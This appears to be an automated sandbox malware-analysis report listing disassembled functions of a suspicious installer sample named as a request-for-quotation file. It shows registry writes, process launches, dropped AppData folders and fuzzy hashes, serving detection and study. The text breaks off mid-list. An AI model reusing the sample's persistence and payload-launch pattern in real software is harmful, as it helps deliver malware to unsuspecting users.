                                                              control_flow_graph 678 4023ea-402430 call 402d48 call 402c53 * 2 RegCreateKeyExW 685 402436-40243e 678->685 686 402adb-402aea 678->686 688 402440-40244d call 402c53 lstrlenW 685->688 689 402451-402454 685->689 688->689 692 402456-402467 call 402c31 689->692 693 402468-40246b 689->693 692->693 694 40247c-402490 RegSetValueExW 693->694 695 40246d-402477 call 40317b 693->695 700 402492 694->700 701 402495-402573 RegCloseKey 694->701 695->694 700->701 701->686 703 4028a1-4028a8 701->703 703->686
                                                              APIs
                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
                                                              • lstrlenW.KERNEL32(0040B5D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateValuelstrlen
                                                              • String ID:
                                                              • API String ID: 1356686001-0
                                                              • Opcode ID: e40e8b1c96886283aa3593c8b640164b0f5af0ed5c68d9aeec9e78129a152cd5
                                                              • Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
                                                              • Opcode Fuzzy Hash: e40e8b1c96886283aa3593c8b640164b0f5af0ed5c68d9aeec9e78129a152cd5
                                                              • Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68
                                                              Function 00401ED5 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 704 401ed5-401ee6 call 402c53 call 405371 call 4058f2 710 401eeb-401ef0 704->710 711 4028a1-4028a8 710->711 712 401ef6-401ef9 710->712 713 402adb-402aea 711->713 714 401f4a-401f53 CloseHandle 712->714 715 401efb-401f0b WaitForSingleObject 712->715 714->711 714->713 717 401f1b-401f1d 715->717 719 401f0d-401f19 call 406628 WaitForSingleObject 717->719 720 401f1f-401f2f GetExitCodeProcess 717->720 719->717 721 401f31-401f3c call 406159 720->721 722 401f3e-401f41 720->722 721->714 722->714 725 401f43 722->725 725->714
                                                              APIs
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 004053CC
                                                                • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\), ref: 004053DE
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                                • Part of subcall function 004058F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                                • Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928
                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401F4D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 3585118688-0
                                                              • Opcode ID: cf6480494dd600882fe39f06b9bc442e246b080cf3c892367169cc4d6b27fe94
                                                              • Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
                                                              • Opcode Fuzzy Hash: cf6480494dd600882fe39f06b9bc442e246b080cf3c892367169cc4d6b27fe94
                                                              • Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A
                                                              Function 00403969 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040397B
                                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040398F
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040396E
                                                              • C:\Users\user\AppData\Local\Temp\nsm1096.tmp\, xrefs: 0040399F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsm1096.tmp\
                                                              • API String ID: 2962429428-2408394559
                                                              • Opcode ID: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
                                                              • Instruction ID: b4aeda79ce9169ff0691def1b455dd989f45c243b0b2f58971613af12f624ab5
                                                              • Opcode Fuzzy Hash: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
                                                              • Instruction Fuzzy Hash: 07E02CB080070492C130AF3CAE4D8853A285F4133A720432BF038F20F0C7788AAB0EA9
                                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30, 4#v.#v,?,76232EE0,00405A23,?,76233420,76232EE0,00000000), ref: 00405C7F
                                                                • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                                • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                • Part of subcall function 00405840: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\afdragsordning\Overrack2,?,00000000,000000F0), ref: 0040164D
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\afdragsordning\Overrack2, xrefs: 00401640
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\AppData\Roaming\afdragsordning\Overrack2
                                                              • API String ID: 1892508949-2472733074
                                                              • Opcode ID: 17b8e001c82381b5eed68947f2b5b6d32a293e51d78029b264e296644810ab81
                                                              • Instruction ID: 477ca9af34b4fba6f67c9146569026d5a406fcfc9585fcc70d51ae903c55bf24
                                                              • Opcode Fuzzy Hash: 17b8e001c82381b5eed68947f2b5b6d32a293e51d78029b264e296644810ab81
                                                              • Instruction Fuzzy Hash: C511D331504505EBCF30BFA4CD0199E36A0FF15358B25893BE902B22F1DB3E4A919B5E
                                                              Function 004058F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                              • CloseHandle.KERNEL32(?), ref: 00405928
                                                              Strings
                                                              • Error launching installer, xrefs: 00405905
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID: Error launching installer
                                                              • API String ID: 3712363035-66219284
                                                              • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                              • Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
                                                              • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                              • Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78
                                                              Function 00406D0F Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                              • Instruction ID: ad0bcc128236992ad7a4f6733702d2b43af4dc4d223e88fe38095793509b9f66
                                                              • Opcode Fuzzy Hash: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                              • Instruction Fuzzy Hash: 62A15671D04229CBDF28CFA8C854AADBBB1FF44305F14816ED856BB281C7785986CF45
                                                              Function 00406F10 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                              • Instruction ID: 6aec0e073e41beee5660f1704474c6018554c7323141eb4488ca3ed34e09e74f
                                                              • Opcode Fuzzy Hash: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                              • Instruction Fuzzy Hash: 71913271D04229CBDF28CFA8C854BADBBB1FF44305F14816AD856BB291C7786986CF45
                                                              Function 00406C26 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                              • Instruction ID: 7ea7bfe366fdde138a2213b1adeace564b33d0438ed0be708c4ee64e1a3b53a1
                                                              • Opcode Fuzzy Hash: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                              • Instruction Fuzzy Hash: 50814531D04228DFDF24CFA8C884BADBBB1FB44305F25816AD856BB291C7789996CF45
                                                              Function 0040672B Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                              • Instruction ID: b0390ff044984b209d4cab8587791f90ef454c2be00e5ddb87b3a87963c4087b
                                                              • Opcode Fuzzy Hash: bf476539507983e16092c80279d888edc01129ecf00556e39cf10d10f419ff7d
                                                              • Instruction Fuzzy Hash: 83814631D04229DBDB24CFA9C844BAEBBB1FB44305F21816AD856BB2C1C7786986DF45
                                                              Function 00406B79 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                              • Instruction ID: b22102ba0a97a3123bbdfffdcb3b598a66073f742a3c91e931c35cfd39b2e4d0
                                                              • Opcode Fuzzy Hash: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                              • Instruction Fuzzy Hash: 2B712271D04229DBDF28CFA8C884BADBBB1FB44305F15806AD806BB291C7789996DF44
                                                              Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                              • Instruction ID: 9997fd61ac043c1521ccfeb60d91edfb3447ef4cf3d9eb85cab0c4916a58cc02
                                                              • Opcode Fuzzy Hash: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                              • Instruction Fuzzy Hash: 5E714331D04229DBDF28CFA8C844BADBBB1FF44305F15806AD846BB290C7785996DF45
                                                              Function 00406BE3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
